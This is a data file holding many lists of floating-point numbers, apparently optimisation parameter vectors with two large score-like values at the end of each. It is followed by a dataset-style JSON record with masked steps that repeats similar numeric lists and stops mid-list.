[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, 5.0382265280257245e-11, -1.743336316696023e-10, -1.813766783798406e-15, 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.735477478457909e-10, 129406444985.873, 132653030892.18918]
[2.2152115305769157e-10, -1.2071709641632366e-12, -2.1051647732787472e-13, 5.011120217163613e-11, -1.7380412465809723e-10, -1.82610373802557e-15, 7.430575474541962e-16, 1.981538293869461e-05, -1.7480334166671461e-06, -1.520980077906525e-08, 8.721578527250325e-10, 133865099427.32999, 140436120253.29218]
[0.0, -1.2059133330572482e-12, -2.1051647732787472e-13, 5.011120217163613e-11, -1.7558160485557454e-10, -1.842789515995345e-15, 7.503695295044637e-16, 1.983133919352831e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.750599822793858e-10, 123172560507.99377, 143105235055.60883]
[-9.575357968769427e-09, -1.2059133330572482e-12, -2.1051647732787472e-13, 5.011120217163613e-11, -1.7558160485557454e-10, -1.8261648304268637e-15, 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.750599822793858e-10, 119639757591.69417, 143860615432.91846]
[2.2282051950271776e-10, -1.2059133330572482e-12, -2.1171136727356646e-13, 5.011120217163613e-11, -1.7558160485557454e-10, -1.82610373802557e-15, 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.750599822793858e-10, 119621740814.33159, 143868003797.30536]
[-9.575357968769427e-09, -1.2028279049571785e-12, -2.1051647732787472e-13, 5.039644867967898e-11, -1.7558160485557454e-10, -1.842789515995345e-15, 7.430575474541962e-16, 1.9863936167468564e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.749223081325664e-10, 121395913545.80966, 144269444777.14786]
[2.2282051950271776e-10, -1.2030336482043862e-12, -2.1051647732787472e-13, 5.011120217163613e-11, -1.7558160485557454e-10, -1.8261648304268637e-15, 7.430575474541962e-16, 1.983133919352831e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.750599822793858e-10, 118220156709.2957, 145085114899.6645]
[2.2282051950271776e-10, -1.2030336482043862e-12, -2.1171136727356646e-13, 5.011120217163613e-11, -1.7471650977559177e-10, -1.8261648304268637e-15, 7.416691902768309e-16, 1.983133919352831e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.750599822793858e-10, 118220156709.04602, 145085114900.12366]
[2.2082942462171206e-10, -1.2071709641632366e-12, -2.0913778067377877e-13, 5.011120217163613e-11, -1.7352085678160897e-10, -1.8261648304268637e-15, 7.430575474541962e-16, 2.0343533479720338e-05, -1.7639524821935923e-06, -1.5074975460776788e-08, 8.721578527250325e-10, 109968109293.02217, 145590447784.79443]
[2.22213071071529e-10, -1.2059133330572482e-12, -2.1085309656936224e-13, 5.021867485100539e-11, -1.7558160485557454e-10, -1.8261648304268637e-15, 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.760267738096764e-10, 111899934222.58044, 153694065180.84283]
[2.2152115305769157e-10, -1.2059133330572482e-12, -2.0866854154642685e-13, 5.011120217163613e-11, -1.766361848796505e-10, -1.8339694239958517e-15, 7.430575474541962e-16, 1.983133919352831e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.760544278271184e-10, 112511385038.11157, 154263245256.49524]
[3.868816176815073e-09, -1.2030336482043862e-12, -2.1171136727356646e-13, 5.021867485100539e-11, -1.7558160485557454e-10, -1.82610373802557e-15, 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, -1.4920809345224143e-08, 8.750599822793858e-10, 102250033424.31876, 164710456294.5225]
[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, 5.011120217163613e-11, -1.7478774930028702e-10, -1.82610373802557e-15, 7.452586179271996e-16, 2.0343533479720338e-05, -1.7639524821935923e-06, -1.4975512206722303e-08, 8.721578527250325e-10, 92516509687.73035, 170174200265.44513]
|
normal
|
{
"blob_id": "bdf3cb1830021b10d6c8966b3341fd9297d9a371",
"index": 2045,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n[1.5780628845471506e-10, -1.411490597458207e-12, -2.483949940281473e-13, \n 5.026488748046414e-11, -1.6612576871621329e-10, -1.6989844545344268e-15,\n 8.109443782655016e-16, 2.404048022255995e-05, -1.9859378185800262e-06, \n -1.6176901999289427e-08, 9.489903548622118e-10, 102704594939.3429, \n 145011267381.10236]\n[6.525636151737385e-10, -1.5516831882387681e-12, -2.3065883936338436e-13, \n 4.6265959327559024e-11, -1.669670220497726e-10, -1.803564324024427e-15,\n 9.085513864943156e-16, 2.3963751617497686e-05, -1.9517021060346726e-06,\n -1.7031696163247858e-08, 9.514461873186105e-10, 165879895673.90985, \n 148817892429.6303]\n[6.525636151737385e-10, -1.5516831882387681e-12, -2.3065883936338436e-13, \n 4.6265959327559024e-11, -1.669670220497726e-10, -1.7924226413310876e-15,\n 9.085513864943156e-16, 2.3963751617497686e-05, -1.9517021060346726e-06,\n -1.68878771600575e-08, 9.514461873186105e-10, 117267023779.58536, \n 138194745977.8172]\n[6.483959591091273e-10, -1.5516831882387681e-12, -2.490649104258458e-13, \n 5.026488748046414e-11, -1.669670220497726e-10, -1.6989844545344268e-15,\n 8.109443782655016e-16, 2.3963751617497686e-05, -1.9859378185800262e-06,\n -1.6176901999289427e-08, 9.514461873186105e-10, 81279986793.6045, \n 148499957167.59894]\n[6.525636151737385e-10, -1.3197261044307544e-12, -2.4458923117817936e-13, \n 4.6265959327559024e-11, -1.6585443429963996e-10, -1.802849923078712e-15,\n 9.085513864943156e-16, 2.3963751617497686e-05, -1.9517021060346726e-06,\n -1.68878771600575e-08, 9.514461873186105e-10, 121168243931.69568, \n 138376625633.08905]\n[6.525636151737385e-10, -1.5516831882387681e-12, -2.3065883936338436e-13, \n 4.59768924730343e-11, -1.6588127033784183e-10, -1.7924226413310876e-15,\n 9.085513864943156e-16, 2.3963751617497686e-05, -1.9859378185800262e-06,\n -1.6176901999289427e-08, 9.503282761551985e-10, 127284942067.54468, \n 147143586736.12967]\n[6.525636151737385e-10, -1.5516831882387681e-12, -2.3065883936338436e-13, \n 
4.6265959327559024e-11, -1.669670220497726e-10, -1.803564324024427e-15,\n 8.4683341745183045e-16, 2.3963751617497686e-05, -1.9517021060346726e-06,\n -1.7031696163247858e-08, 9.514461873186105e-10, 165879895673.90985, \n 148817892429.6303]\n[6.483959591091273e-10, -1.5516831882387681e-12, -2.477506624442777e-13, \n 5.026488748046414e-11, -1.669670220497726e-10, -1.7924226413310876e-15,\n 8.070333012129768e-16, 2.4138485475672502e-05, -1.9859378185800262e-06,\n -1.6108027319186075e-08, 9.514461873186105e-10, 78167992157.7952, \n 149819556305.94864]\n[2.8389500911155237e-10, -1.3179669217824132e-12, -2.1290409882195637e-13, \n 5.0376537605765665e-11, -1.7763084077799175e-10, -\n 1.8081388431942655e-15, 8.940150894056582e-16, 2.501288034169883e-05, -\n 2.04721003e-06, -1.5842532923181598e-08, 9.632771875757591e-10, \n 108694336300.90585, 154375559012.27695]\n[3.603083193105678e-11, -1.3197261044307544e-12, -2.213785963757499e-13, \n 4.581086934703742e-11, -1.6681614728164575e-10, -1.803564324024427e-15,\n 8.4683341745183045e-16, 2.4065016435368993e-05, -2.0711260096490455e-06,\n -1.7031696163247858e-08, 1.0052651438176042e-09, 98921398930.67514, \n 195080915978.15582]\n[-2.0926038768787875e-10, -1.4706748741606338e-12, -2.3988654320236774e-13,\n 4.877026722101481e-11, -1.4519789238682426e-10, -1.8284483886533772e-15,\n 8.688144408462996e-16, 2.7398930354457147e-05, -1.8015495121292713e-06,\n -1.818410294118833e-08, 8.90965422552221e-10, 100727388654.51337, \n 143318140783.98648]\n[-2.0926038768787875e-10, -1.4706748741606338e-12, -1.9531413192683389e-13,\n 4.852404641399239e-11, -1.450370910345386e-10, -1.9257301298903336e-15,\n 8.688144408462996e-16, 2.7370809361932293e-05, -1.8015495121292713e-06,\n -1.818410294118833e-08, 8.935114691513575e-10, 112772825510.86789, \n 160453198244.84198]\n[-8.304227478096081e-10, -1.500986356346536e-12, -1.9531413192683389e-13, \n 4.764041880667976e-11, -1.8918518378579712e-10, -1.9257301298903336e-15,\n 8.688144408462996e-16, 
2.7122228639393258e-05, -1.8099079507631247e-06,\n -1.8203397437532012e-08, 8.935114691513575e-10, 177535436392.6114, \n 109895891048.79645]\n[-2.0926038768787875e-10, -1.6406892521440393e-12, -1.9531413192683389e-13,\n 4.85603371945204e-11, -1.450370910345386e-10, -1.9257301298903336e-15, \n 8.688144408462996e-16, 2.7370809361932293e-05, -1.8015495121292713e-06,\n -1.836034443165441e-08, 8.935114691513575e-10, 150364957402.63327, \n 122880053749.32047]\n[-8.223802918909379e-10, -1.4625176901480844e-12, -2.703868659848318e-13, \n 4.852404641399239e-11, -1.896863627503491e-10, -1.9257301298903336e-15,\n 8.688144408462996e-16, 2.697391208672331e-05, -1.7223534426462784e-06, \n -1.7212440323693525e-08, 8.377481199786938e-10, 199237170018.58218, \n 130994741061.18477]\n[-2.1118416643089627e-10, -1.459747004615292e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4471230416768517e-10, -1.9257301298903336e-15,\n 8.688144408462996e-16, 2.7267797101210102e-05, -1.8015495121292713e-06,\n -1.818410294118833e-08, 8.935114691513575e-10, 120611068648.22205, \n 148716985588.15564]\n[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.9412676391052573e-13,\n 4.852404641399239e-11, -1.4675478300173032e-10, -1.8210829282495652e-15,\n 8.751158883884222e-16, 2.492800478197597e-05, -1.8015495121292713e-06, \n -1.830053261436748e-08, 9.081976758127089e-10, 190052435274.9098, \n 101545825010.15762]\n[-2.0926038768787875e-10, -1.647013760811586e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4446129047664535e-10, -1.8210829282495652e-15,\n 8.731899868495941e-16, 2.4857867004975476e-05, -1.8015495121292713e-06,\n -1.8287117187317536e-08, 9.081976758127089e-10, 195239394048.3779, \n 101879284463.33914]\n[-8.372413642600907e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4675478300173032e-10, -1.8210829282495652e-15,\n 8.765174154706532e-16, 2.492800478197597e-05, -1.8015495121292713e-06, \n -1.8287117187317536e-08, 
9.087619653117874e-10, 178582869424.88885, \n 102270797763.39908]\n[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.937673308636816e-13, \n 4.852404641399239e-11, -1.432701673757514e-10, -1.8210829282495652e-15,\n 8.765174154706532e-16, 2.4703687041471573e-05, -1.7900208911755532e-06,\n -1.836034443165441e-08, 9.087619653117874e-10, 171732970643.1874, \n 106305215455.77405]\n[-8.304227478096081e-10, -1.500986356346536e-12, -1.9531413192683389e-13, \n 4.7704075824842225e-11, -1.8975666267494283e-10, -\n 1.9099300746589145e-15, 8.757096667187756e-16, 2.7122228639393258e-05, \n -1.809239966469619e-06, -1.8203397437532012e-08, 8.935114691513575e-10,\n 166731944707.48343, 109962566902.69849]\n[-2.0926038768787875e-10, -1.3235354562894133e-12, -1.9531413192683389e-13,\n 4.852404641399239e-11, -1.5027518840822802e-10, -1.9355556139972827e-15,\n 8.69779310515605e-16, 2.492800478197597e-05, -1.8015495121292713e-06, -\n 1.830053261436748e-08, 9.113315958572542e-10, 198705325524.15018, \n 111850971687.16727]\n[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.9531413192683389e-13,\n 4.858844276736905e-11, -1.5027518840822802e-10, -1.9257301298903336e-15,\n 8.765174154706532e-16, 2.507247127369048e-05, -1.8015495121292713e-06, \n -1.830053261436748e-08, 9.134614417430693e-10, 152877011534.3794, \n 128488226222.4665]\n[-8.325113652893972e-10, -1.647013760811586e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4675478300173032e-10, -1.8226533446456543e-15,\n 8.718221314640016e-16, 2.471871023322042e-05, -1.788813296914756e-06, -\n 1.836034443165441e-08, 9.148927620445716e-10, 115664967416.85544, \n 172987399752.44284]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4675478300173032e-10, -1.799249889019179e-15,\n 8.763652695826297e-16, 2.4957985197946978e-05, -1.7900208911755532e-06,\n -1.836034443165441e-08, 9.035879148460716e-10, 195862055252.448, \n 98829512345.71223]\n[-8.372802930516975e-10, 
-1.647013760811586e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4675478300173032e-10, -1.815921924023075e-15,\n 8.765346456450067e-16, 2.4957985197946978e-05, -1.799557982850986e-06, \n -1.836034443165441e-08, 9.081976758127089e-10, 191606485390.66824, \n 100937635343.36494]\n[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.9531413192683389e-13,\n 4.869384519400452e-11, -1.432701673757514e-10, -1.8130493256774034e-15,\n 8.765174154706532e-16, 2.492800478197597e-05, -1.8015495121292713e-06, \n -1.836034443165441e-08, 9.087619653117874e-10, 197397120635.11142, \n 101220474756.5564]\n[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.924272863609467e-13, \n 4.852404641399239e-11, -1.4730851235460287e-10, -1.8195538935082505e-15,\n 8.751158883884222e-16, 2.492800478197597e-05, -1.8015495121292713e-06, \n -1.830053261436748e-08, 9.081976758127089e-10, 189380748451.24603, \n 101440046940.62292]\n[-2.0926038768787875e-10, -1.647013760811586e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4663924630161214e-10, -1.815921924023075e-15,\n 8.688144408462996e-16, 2.4957985197946978e-05, -1.8015495121292713e-06,\n -1.8287117187317536e-08, 9.081976758127089e-10, 179897941081.52283, \n 101479475091.5385]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4675478300173032e-10, -1.8210829282495652e-15,\n 8.725909439109588e-16, 2.4957985197946978e-05, -1.8015495121292713e-06,\n -1.830053261436748e-08, 9.081976758127089e-10, 186125019263.05353, \n 101522685052.87083]\n[-8.372413642600907e-10, -1.647013760811586e-12, -1.9531413192683389e-13, \n 4.826770959894538e-11, -1.4675478300173032e-10, -1.815921924023075e-15,\n 8.675713932751666e-16, 2.492800478197597e-05, -1.8015495121292713e-06, \n -1.8287117187317536e-08, 9.087619653117874e-10, 176424094355.21158, \n 102059630396.96977]\n[-8.32774857282967e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, 
-1.475667375214216e-10, -1.8210829282495652e-15,\n 8.765174154706532e-16, 2.4703687041471573e-05, -1.7921694947468313e-06,\n -1.836034443165441e-08, 9.080472327376693e-10, 190619161162.84558, \n 102134941196.42899]\n[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.9412676391052573e-13,\n 4.835930442286039e-11, -1.4675478300173032e-10, -1.8210829282495652e-15,\n 8.751158883884222e-16, 2.492800478197597e-05, -1.8015495121292713e-06, \n -1.8287117187317536e-08, 9.087619653117874e-10, 178582869424.89273, \n 102270797763.3992]\n[-8.372413642600907e-10, -1.3359785407261977e-12, -1.9482957217087468e-13, \n 4.831070029448083e-11, -1.4675478300173032e-10, -1.8210829282495652e-15,\n 8.688144408462996e-16, 2.492800478197597e-05, -1.8015495121292713e-06, \n -1.8287117187317536e-08, 9.087619653117874e-10, 178582869424.89435, \n 102270797763.39929]\n[-2.0926038768787875e-10, -1.647013760811586e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4446129047664535e-10, -1.8304219886094965e-15,\n 8.765174154706532e-16, 2.4857867004975476e-05, -1.8015495121292713e-06,\n -1.8287117187317536e-08, 9.087619653117874e-10, 191644867011.30374, \n 102518032445.5969]\n[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.9412676391052573e-13,\n 4.82400894161232e-11, -1.4446129047664535e-10, -1.8228595048374295e-15,\n 8.751158883884222e-16, 2.506841119647095e-05, -1.8015495121292713e-06, \n -1.830053261436748e-08, 9.081976758127089e-10, 172947032775.99432, \n 102577021916.3392]\n[-2.103367158359051e-10, -1.3359785407261977e-12, -1.9376482536341035e-13, \n 4.852404641399239e-11, -1.432701673757514e-10, -1.8210829282495652e-15,\n 8.765174154706532e-16, 2.4703687041471573e-05, -1.7900208911755532e-06,\n -1.836034443165441e-08, 9.087619653117874e-10, 171732970643.1874, \n 106305215455.77405]\n[-8.372413642600907e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4675478300173032e-10, -1.8210829282495652e-15,\n 8.765174154706532e-16, 
2.492800478197597e-05, -1.8015495121292713e-06, \n -1.8161784527844478e-08, 9.087619653117874e-10, 144963603428.97382, \n 112061347287.60056]\n[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.9412676391052573e-13,\n 4.852404641399239e-11, -1.4675478300173032e-10, -1.8210829282495652e-15,\n 8.765174154706532e-16, 2.5026084747023036e-05, -1.7900208911755532e-06,\n -1.830053261436748e-08, 9.087619653117874e-10, 125853468889.92097, \n 136457449593.06062]\n[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.937673308636816e-13, \n 4.852404641399239e-11, -1.432701673757514e-10, -1.8210829282495652e-15,\n 8.765174154706532e-16, 2.4703687041471573e-05, -1.776082515662521e-06, \n -1.836034443165441e-08, 9.087619653117874e-10, 126137991779.33096, \n 160562679389.67618]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4675478300173032e-10, -1.799249889019179e-15,\n 8.763652695826297e-16, 2.4957985197946978e-05, -1.7900208911755532e-06,\n -1.836034443165441e-08, 9.035879148460716e-10, 195862055252.448, \n 98829512345.71223]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4675478300173032e-10, -1.803543054789903e-15,\n 8.763652695826297e-16, 2.4957985197946978e-05, -1.799557982850986e-06, \n -1.836034443165441e-08, 9.081976758127089e-10, 186222924740.70007, \n 100125948657.42978]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9475632661250835e-13, \n 4.855683396544643e-11, -1.4675478300173032e-10, -1.815921924023075e-15,\n 8.83613368865103e-16, 2.4957985197946978e-05, -1.8015495121292713e-06, \n -1.830053261436748e-08, 9.081976758127089e-10, 183895104728.34744, \n 101215117638.35565]\n[-2.0926038768787875e-10, -1.3382357152930057e-12, -1.9531413192683389e-13,\n 4.869384519400452e-11, -1.432701673757514e-10, -1.8130493256774034e-15,\n 8.765174154706532e-16, 2.492800478197597e-05, -1.8015495121292713e-06, \n -1.836034443165441e-08, 9.087619653117874e-10, 
197397120635.11142, \n 101220474756.5564]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.432701673757514e-10, -1.8130493256774034e-15,\n 8.765174154706532e-16, 2.492800478197597e-05, -1.8015495121292713e-06, \n -1.836034443165441e-08, 9.087619653117874e-10, 197397120635.11664, \n 101220474756.55742]\n[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.924272863609467e-13, \n 4.852404641399239e-11, -1.476291648179518e-10, -1.8195538935082505e-15,\n 8.751158883884222e-16, 2.492800478197597e-05, -1.8015495121292713e-06, \n -1.830053261436748e-08, 9.081976758127089e-10, 189380748451.4617, \n 101440046940.6675]\n[-2.0969974314689316e-10, -1.647013760811586e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4663924630161214e-10, -1.815921924023075e-15,\n 8.725909439109588e-16, 2.4957985197946978e-05, -1.8015495121292713e-06,\n -1.8287117187317536e-08, 9.081976758127089e-10, 179897941081.52283, \n 101479475091.5385]\n[-2.0926038768787875e-10, -1.647013760811586e-12, -1.9531413192683389e-13, \n 4.8730627003901226e-11, -1.4675478300173032e-10, -1.815921924023075e-15,\n 8.725909439109588e-16, 2.4957985197946978e-05, -1.8015495121292713e-06,\n -1.8287117187317536e-08, 9.081976758127089e-10, 179897941081.58997, \n 101479475091.5439]\n[-2.0926038768787875e-10, -1.6370065196284276e-12, -1.9531413192683389e-13,\n 4.852404641399239e-11, -1.4663924630161214e-10, -1.8210829282495652e-15,\n 8.725909439109588e-16, 2.5149586855224063e-05, -1.8040587516026417e-06,\n -1.830053261436748e-08, 9.081976758127089e-10, 174674218067.03134, \n 101707557509.25955]\n[-2.0780704759852712e-10, -1.3359785407261977e-12, -1.928247479392491e-13, \n 4.852404641399239e-11, -1.4675478300173032e-10, -1.815921924023075e-15,\n 8.815489945689696e-16, 2.492800478197597e-05, -1.799557982850986e-06, -\n 1.830053261436748e-08, 9.081976758127089e-10, 177564736843.2668, \n 101910116331.42278]\n[-2.0926038768787875e-10, -1.3481496678499343e-12, 
-1.9612804716494087e-13,\n 4.869384519400452e-11, -1.4625361988654996e-10, -1.816149350524488e-15,\n 8.725909439109588e-16, 2.4957985197946978e-05, -1.8015495121292713e-06,\n -1.830053261436748e-08, 9.087619653117874e-10, 176677319245.07892, \n 101942928295.47075]\n[-8.324503936172223e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4535167828811644e-10, -1.799249889019179e-15,\n 8.763652695826297e-16, 2.4957985197946978e-05, -1.7900208911755532e-06,\n -1.836034443165441e-08, 9.063398319687734e-10, 161710635101.41095, \n 104790698646.6004]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.8168585276282465e-11, -1.4675478300173032e-10, -\n 1.8210829282495652e-15, 8.725909439109588e-16, 2.4957985197946978e-05, \n -1.8015495121292713e-06, -1.830053261436748e-08, 9.102513898455556e-10,\n 160649925757.17908, 106424978687.80653]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.869384519400452e-11, -1.4675478300173032e-10, -1.799249889019179e-15,\n 8.765174154706532e-16, 2.4957985197946978e-05, -1.7900208911755532e-06,\n -1.836034443165441e-08, 9.067222192179334e-10, 157509126624.7564, \n 106648081137.30634]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.924272863609467e-13, \n 4.87567764690249e-11, -1.473869541008466e-10, -1.8210829282495652e-15, \n 8.797810044472039e-16, 2.5128697145423343e-05, -1.8015495121292713e-06,\n -1.830053261436748e-08, 9.089655956213592e-10, 156027014786.34595, \n 106784848298.00577]\n[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.9531413192683389e-13,\n 4.852404641399239e-11, -1.4675478300173032e-10, -1.8130493256774034e-15,\n 8.758120054489215e-16, 2.489589641570383e-05, -1.8015495121292713e-06, \n -1.836034443165441e-08, 9.120599461707459e-10, 159857940983.01962, \n 106918161793.97298]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9347415380665696e-13, \n 4.85631967683728e-11, -1.4675478300173032e-10, 
-1.8210829282495652e-15,\n 8.725909439109588e-16, 2.4957985197946978e-05, -1.8015495121292713e-06,\n -1.836417410231251e-08, 9.134390375783151e-10, 142628527511.76648, \n 117274357359.96004]\n[-2.0926038768787875e-10, -1.647013760811586e-12, -1.9567576322418712e-13, \n 4.852404641399239e-11, -1.4663924630161214e-10, -1.815921924023075e-15,\n 8.688144408462996e-16, 2.4957985197946978e-05, -1.8015495121292713e-06,\n -1.8287117187317536e-08, 9.120365536291957e-10, 136801158565.52109, \n 118996909122.33968]\n[-2.0926038768787875e-10, -1.3468298773490566e-12, -1.924272863609467e-13, \n 4.852404641399239e-11, -1.4730851235460287e-10, -1.8210829282495652e-15,\n 8.725909439109588e-16, 2.4957985197946978e-05, -1.8015495121292713e-06,\n -1.830053261436748e-08, 9.13148553316506e-10, 131221998343.07083, \n 125656067768.88814]\n[-8.372802930516975e-10, -1.6610460978653825e-12, -1.9391155389121011e-13, \n 4.852404641399239e-11, -1.4675478300173032e-10, -1.799249889019179e-15,\n 8.765346456450067e-16, 2.500200335107093e-05, -1.777109321965829e-06, -\n 1.836034443165441e-08, 9.081976758127089e-10, 107442969837.9951, \n 191438895729.71088]\n[-8.373514643167848e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4675478300173032e-10, -1.799249889019179e-15,\n 8.705169785374419e-16, 2.4957985197946978e-05, -1.7900208911755532e-06,\n -1.836034443165441e-08, 9.035879148460716e-10, 195862055252.448, \n 98829512345.71223]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4659424506650604e-10, -1.7864100157215748e-15,\n 8.706272486016714e-16, 2.492800478197597e-05, -1.8015495121292713e-06, \n -1.836034443165441e-08, 9.087619653117874e-10, 185690352687.11697, \n 99223644222.007]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9475632661250835e-13, \n 4.852404641399239e-11, -1.4675478300173032e-10, -1.803543054789903e-15,\n 8.839563844754409e-16, 2.4957985197946978e-05, -1.799557982850986e-06, \n 
-1.836034443165441e-08, 9.081976758127089e-10, 186222924740.70007, \n 100125948657.42978]\n[-8.29844666406642e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.849645416672899e-11, -1.4675478300173032e-10, -1.803543054789903e-15,\n 8.714032924475303e-16, 2.492800478197597e-05, -1.799557982850986e-06, -\n 1.836034443165441e-08, 9.081976758127089e-10, 190148608462.3534, \n 100180028793.61896]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.869384519400452e-11, -1.432701673757514e-10, -1.8130493256774034e-15,\n 8.765174154706532e-16, 2.5177177276929545e-05, -1.7997194394724915e-06,\n -1.850709631603352e-08, 9.087619653117874e-10, 199924589208.46686, \n 100223589650.82378]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9654069739659012e-13, \n 4.855683396544643e-11, -1.461461940090847e-10, -1.803543054789903e-15, \n 8.763652695826297e-16, 2.4957985197946978e-05, -1.8015495121292713e-06,\n -1.830053261436748e-08, 9.081976758127089e-10, 178626169889.2221, \n 100558408593.70113]\n[-8.332310924150067e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.8877585360256924e-11, -1.4675478300173032e-10, -\n 1.8130493256774034e-15, 8.763652695826297e-16, 2.4957985197946978e-05, \n -1.8015495121292713e-06, -1.836034443165441e-08, 9.087619653117874e-10,\n 193351738763.71564, 100949387586.23102]\n[-8.372802930516975e-10, -1.343853363763315e-12, -1.9192642832280474e-13, \n 4.852404641399239e-11, -1.446871529700577e-10, -1.8130493256774034e-15,\n 8.765174154706532e-16, 2.492800478197597e-05, -1.8015495121292713e-06, \n -1.836034443165441e-08, 9.087619653117874e-10, 197397120636.1133, \n 101220474756.86967]\n[-2.081071620571536e-10, -1.3430194729908366e-12, -1.9531413192683389e-13, \n 4.8687777307168814e-11, -1.432701673757514e-10, -1.8195538935082505e-15,\n 8.751158883884222e-16, 2.492800478197597e-05, -1.8015495121292713e-06, \n -1.830053261436748e-08, 9.081976758127089e-10, 189380748448.52612, \n 
101440046940.05927]\n[-8.372802930516975e-10, -1.3382357152930057e-12, -1.9531413192683389e-13, \n 4.869384519400452e-11, -1.432701673757514e-10, -1.815921924023075e-15, \n 8.834544584685654e-16, 2.492800478197597e-05, -1.8015495121292713e-06, \n -1.836034443165441e-08, 9.087619653117874e-10, 198690577754.9655, \n 101467426817.57397]\n[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.924272863609467e-13, \n 4.8327983670281894e-11, -1.4675478300173032e-10, -\n 1.8258864221284576e-15, 8.83613368865103e-16, 2.492800478197597e-05, -\n 1.8015495121292713e-06, -1.8304452912365864e-08, 9.081976758127089e-10,\n 193392923341.53983, 101900620617.14302]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9719420123154376e-13, \n 4.861133464689211e-11, -1.483232636118454e-10, -1.8195538935082505e-15,\n 8.765174154706532e-16, 2.492800478197597e-05, -1.7966453439138136e-06, \n -1.836034443165441e-08, 9.087619653117874e-10, 174954502194.04602, \n 103131734300.077]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.814072294943091e-11, -1.437983579446461e-10, -1.8130493256774034e-15,\n 8.765174154706532e-16, 2.492800478197597e-05, -1.8015495121292713e-06, \n -1.836034443165441e-08, 9.107645094765291e-10, 171249412831.2997, \n 103180541968.40872]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.476291648179518e-10, -1.7906363569860738e-15,\n 8.751158883884222e-16, 2.492800478197597e-05, -1.8015495121292713e-06, \n -1.8221372696029056e-08, 9.081976758127089e-10, 154981149327.29538, \n 103805616436.34537]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.855683396544643e-11, -1.432701673757514e-10, -1.825643030416898e-15, \n 8.83613368865103e-16, 2.492800478197597e-05, -1.8015495121292713e-06, -\n 1.81828896229741e-08, 9.081976758127089e-10, 158250536108.31226, \n 106843736334.12831]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9439448414369486e-13, \n 
